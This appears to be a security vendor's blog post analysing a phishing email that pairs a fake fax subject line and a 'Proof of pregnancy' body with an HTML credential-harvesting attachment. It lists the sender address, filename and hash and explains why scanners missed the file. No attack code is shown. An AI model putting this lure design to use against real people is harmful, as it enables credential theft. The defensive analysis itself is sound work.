The Fax Notification That Was Just a Pregnancy Test for Your Curiosity

The subject line read "[FAX] 300564241." The body contained two lines: "Proof of pregnancy" and "Sent from my iPhone." An HTML attachment sat at the bottom of the message, 24,669 bytes, waiting to be opened.

It arrived from a Gmail address, morgancgooding@gmail[.]com, with full SPF, DKIM, and DMARC authentication. This was not a spoofed sender. Google's infrastructure confirmed the message was legitimately sent through Gmail. Every automated scanner that evaluated the attachment returned a clean verdict.

The curiosity factor was the entire weapon. The bizarre combination of a fax notification and a pregnancy reference created exactly the kind of cognitive dissonance that makes people click. That instinct to investigate is what social engineering exploits at scale.

The Attachment That Scanners Could Not Read

The HTML file, named a1f939ee-aacc-49c9-8488-8b0e537c0aac.html, carried an MD5 hash of 71c8586fc813ed173c905f09756b3364. At nearly 25KB, it was large enough to contain substantial obfuscated JavaScript and a full credential harvesting form.

HTML attachment phishing works because the payload executes locally in the recipient's browser, not on a remote server. There is no URL for a gateway to scan. There is no domain reputation to check. The file renders from the local filesystem, presenting a login form or data collection page that captures credentials and transmits them to an attacker-controlled endpoint.

In this case, the sandbox environment could not even extract the file's contents, returning a FileNotFoundError during automated analysis. When a scanner cannot inspect a file, it typically defaults to a clean verdict. The attachment passed every gate.

A Minimal Lure With Maximum Leverage

The email body contained no links, no corporate branding, no urgency language, and no instructions. The "Sent from my iPhone" signature is a stock iOS footer that adds a layer of casual legitimacy. The entire social engineering payload was compressed into three elements: a fax number in the subject, a provocative phrase in the body, and an HTML file that answered the question the recipient was already asking.

This is a credential harvesting technique that inverts the typical phishing model. Instead of building an elaborate pretext to convince the recipient the email is legitimate, the attacker built a pretext so strange that the recipient's curiosity overrides their caution.

Adaptive AI flagged the message based on first-time sender signals, the mismatch between the Gmail sending address and the fax notification pretext, and behavioral patterns associated with HTML attachment delivery. The gateway quarantined the message before the recipient could open the file.

See Your Risk: Calculate how many threats your SEG is missing

Indicators of Compromise

MITRE ATT&CK Mapping